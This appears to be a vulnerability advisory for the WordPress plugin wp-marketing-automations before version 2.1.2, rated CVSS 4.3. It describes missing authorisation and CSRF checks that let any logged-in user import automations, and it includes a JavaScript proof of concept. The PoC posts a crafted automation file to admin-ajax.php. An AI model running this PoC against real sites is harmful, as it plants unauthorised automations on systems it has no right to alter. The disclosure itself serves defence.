4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
The plugin does not have authorisation and CSRF checks in one of its AJAX action, allowing any authenticated users, such as subscriber to create automations
var data = new FormData() data.append(‘file’,new Blob(['[{“data”:{“source”:“wp”,“event”:“wp_user_login”,“start”:“1”,“v”:“2”},“meta”:{“title”:“t”,“event_meta”:“”,“actions”:“”,“a_track_id”:0,“condition”:“”,“run_count”:0,“ui”:“”,“requires_update”:0,“uiData”:“”,“steps”:[{“id”:“start”,“type”:“start”,“data”:{“icon”:“rocket”,“event”:“wp_user_login”,“evtGroup”:“wp”,“count”:0,“note”:“”},“hidden”:false,“position”:{“x”:0.0004269199384684752,“y”:-23.5},“targetPosition”:“top”,“sourcePosition”:“bottom”,“hasMultiParents”:false},{“id”:“end”,“type”:“end”,“data”:{“label”:“End Automation”},“hidden”:false,“position”:{“x”:0.00015686161315141622,“y”:357.5},“targetPosition”:“top”,“sourcePosition”:“bottom”,“hasMultiParents”:false},{“id”:“3”,“type”:“action”,“stepId”:1,“step_status”:2,“hidden”:false,“data”:[],“position”:{“x”:0.0007870621141599978,“y”:159.5},“targetPosition”:“top”,“sourcePosition”:“bottom”,“hasMultiParents”:false}],“links”:[{“id”:“endlink”,“source”:“3”,“target”:“end”,“sourceHandle”:“”,“animated”:false,“label”:“”,“isHidden”:false},{“id”:“2-3”,“source”:“start”,“label”:“”,“target”:“3”,“sourceHandle”:“”,“animated”:false}],“count”:“3”,“step_iteration_array”:{“1”:[{“next”:“end”,“type”:“end”}],“start”:[{“next”:1,“type”:“action”}]}},“step_data”:{“1”:{“ID”:“1”,“aid”:“1”,“type”:“2”,“action”:“{\"action\":\"wp_sendemail\",\"intergration\":\"wp\"}”,“status”:“1”,“data”:"{\"sidebarData\":{\"bwfan_email_to\":\"[email protected]\",\"bwfan_email_data\":{\"subject\":\"test\",\"data\":{\"preheader\":\"\",\"utmEnabled\":false,\"utm\":{\"source\":\"Newsletter\",\"medium\":\"email\",\"name\":\"\",\"content\":\"\",\"term\":\"\"},\"isTransactional\":false,\"overrideSenderInfo\":false},\"mode\":1,\"template\":\"<\\\\\/p>Hi {{contact_first_name}},<\\\\\/p>
<\\\\\/p>
{{business_name}}, {{business_address}}<\\\\\/span>
[unsubscribe<\\\\\/a><\\\\\/span><\\\\\/p>\"}}}",“created_at”:“2022-07-10 13:11:27”,“updated_at”:“2022-07-10 13:12:56”}}}]‘]),‘x’) fetch(’/wp-admin/admin-ajax.php?action=bwf_import_automations_json_file’, { method: ‘POST’, body: data }).then(response => response.text()) .then(data => console.log(data));
CPE | Name | Operator | Version |
---|---|---|---|
wp-marketing-automations | lt | 2.1.2 |